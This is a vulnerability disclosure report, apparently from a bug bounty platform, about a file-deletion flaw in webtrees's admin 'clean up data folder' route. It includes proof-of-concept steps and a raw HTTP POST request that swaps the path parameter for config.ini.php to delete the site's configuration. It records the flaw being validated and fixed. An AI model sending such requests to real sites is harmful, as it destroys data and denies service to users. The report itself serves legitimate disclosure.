Insufficient Isolation of System-Dependent Functions in fisharebest/webtrees

Valid

Reported on

Sep 12th 2021


✍️ Description

A malicious actor, either logged in as an admin or after intercepting a request, is able to modify the path argument in the delete-path route, and can arbitrarily delete index.php or config.ini.php, rendering the site unusable.

🕵️‍♂️ Proof of Concept

1; An admin should navigate to the Clean up data folder in the Control Panel menu and click delete on a deletable folder such as cache/.

2; Intercept the POST request and replace the argument for path= with config.ini.php. (Alternatively use the request below and replace the appropriate values

3; Send the request and get 204 No Content Response

4; Refresh the site, which is now unavailable since it wants to reinstall itself because of the missing config file.

POST /webtrees/index.php?route=%2Fwebtrees%2Fadmin%2Fdelete-path&path=config.ini.php HTTP/1.1 Host: (-----Replace-----) User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://hunterbase.duckdns.org:8000/webtrees/index.php?route=%2Fwebtrees%2Fadmin%2Fclean X-CSRF-TOKEN: (-----Replace-----) X-Requested-with: XMLHttpRequest Origin: (-----Replace-----) Connection: close Cookie: (-----Replace-----)

💥 Impact

While highly privileged, the Clean up data folder function essential allows anyone with an admin session cookie (obtained or intercepted) to complete a denial of service attack by deleting an important config file, rendering the site unusable for everyone.

Suggestion

Match the request against a defined list of files that should not be deleted.

📍 Location CleanDataFolder.php#L92

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back a year ago
PHoward modified the report
a year ago
Greg Roach validated this vulnerability a year ago
PHoward has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach marked this as fixed with commit dde5ec a year ago
Greg Roach has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation